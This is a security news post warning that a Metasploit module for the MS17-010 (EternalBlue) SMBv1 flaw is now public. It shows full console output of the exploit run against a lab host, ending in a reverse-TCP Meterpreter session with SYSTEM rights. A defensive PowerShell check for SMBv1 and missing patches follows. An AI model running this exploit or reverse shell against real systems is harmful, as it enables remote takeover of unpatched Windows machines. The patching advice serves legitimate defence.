
Remote exploit for MS17-010 – now available in Metasploit

16 May 2017, 20:24 | In brief | 3 comments

Anyone who still hasn't patched their Windows machines should hurry up. A public exploit for MS17-010 is now available: remote code execution as SYSTEM on Windows, over the SMBv1 protocol (TCP port 445), with no credentials required. As a reminder, this is the bug used by the WannaCrypt / Wana Decrypt0r 2.0 / WannaCry ransomware.

Using the exploit takes no great expertise: set the target and the payload, then just pull the trigger:

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Connecting to target for exploitation.
[+] 192.168.33.129:445 - Connection established for exploitation.
[*] 192.168.33.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.33.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.33.129:445 - Sending NT Trans Request packet
[*] 192.168.33.129:445 - Receiving NT Trans packet
[*] 192.168.33.129:445 - Making :eb_trans2_zero packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Sending malformed Trans2 packets
[*] 192.168.33.129:445 - Starting non-paged pool grooming
[*] 192.168.33.129:445 - Sending start free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Sending SMBv2 buffers
[*] 192.168.33.129:445 - Sending end free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.33.129:445 - Sending final SMBv2 buffers.
[*] 192.168.33.129:445 - Sending last fragment of exploit packet!
[*] 192.168.33.129:445 - Making :eb_trans2_exploit packet
[*] 192.168.33.129:445 - Receiving response from exploit packet
[+] 192.168.33.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.33.129:445 - Sending egg to corrupted connection.
[*] 192.168.33.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:49159) at 2017-05-14 20:03:33 -0500
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KAUD1INC0IJ
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

For now the module is confirmed to work against Windows 7 x64 and Windows Server 2008 R2 SP1 (x64 only). Ports to 32-bit targets and to Windows XP are in progress.
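The post says to patch; the check a defender wants is whether a given host still meets the conditions the module needs. The script below is an added example, not code from the sekurak post or from Metasploit. It targets the platform family the module is confirmed against (Windows 7 SP1 / Server 2008 R2 SP1) and assumes it is run from an elevated PowerShell prompt. It uses the registry switch Microsoft documents for turning off the SMBv1 server on those versions (the SMB1 DWORD under LanmanServer\Parameters), and it checks for KB4012212 and KB4012215, the March 2017 security-only update and monthly rollup that carried MS17-010 for that OS family; because later cumulative rollups supersede them, their absence is a hint that the host is unpatched, not proof.

```powershell
# Added example (not from the sekurak post or from Metasploit): local exposure check
# for MS17-010 on Windows 7 SP1 / Server 2008 R2 SP1. Run as administrator.
# Assumption: KB4012212 / KB4012215 are the MS17-010 updates for this OS family;
# later rollups supersede them, so "not installed" is a warning, not a verdict.

$smbParams  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$ms17010Kbs = @('KB4012212', 'KB4012215')   # Win7 SP1 / 2008 R2 SP1 only

function Get-Smb1ServerState {
    # The SMB1 value does not exist by default; absent or non-zero means the
    # server still speaks SMBv1, which is what ETERNALBLUE needs.
    $value = (Get-ItemProperty -Path $smbParams -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $value -or $value -ne 0) { 'Enabled' } else { 'Disabled' }
}

function Test-Ms17010Hotfix {
    # True if either of the listed KBs shows up in the installed hotfix list.
    $installed = Get-HotFix -ErrorAction SilentlyContinue |
                 Select-Object -ExpandProperty HotFixID
    foreach ($kb in $ms17010Kbs) {
        if ($installed -contains $kb) { return $true }
    }
    return $false
}

function Disable-Smb1Server {
    # Microsoft's documented registry mitigation for the SMBv1 server on
    # Windows 7 / 2008 R2; takes effect after a reboot. This reduces exposure
    # but does not replace the patch.
    Set-ItemProperty -Path $smbParams -Name SMB1 -Type DWord -Value 0 -Force
}

$os = Get-WmiObject Win32_OperatingSystem
Write-Host ("OS:                  {0} ({1})" -f $os.Caption, $os.Version)
Write-Host ("SMBv1 server:        {0}" -f (Get-Smb1ServerState))
Write-Host ("MS17-010 KB present: {0}" -f (Test-Ms17010Hotfix))

if ((Get-Smb1ServerState) -eq 'Enabled' -and -not (Test-Ms17010Hotfix)) {
    Write-Warning 'Host still serves SMBv1 and has no MS17-010 update listed: likely exploitable.'
    # Uncomment to apply the mitigation immediately; patch regardless.
    # Disable-Smb1Server
}
```

The registry check is used rather than Get-SmbServerConfiguration because that cmdlet only exists from Windows 8 / Server 2012 onward, while the module's confirmed targets ship PowerShell 2.0. Hosts whose TCP port 445 is blocked by the perimeter are not remotely reachable by this exploit, but the SMBv1 server and the patch state still matter for lateral movement inside the network, which is how WannaCry spread.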

–ms

Comments

  1. Wujek Pawel

    So where's the link to the source?

  2. q

    Handy for launching apps on oscilloscopes
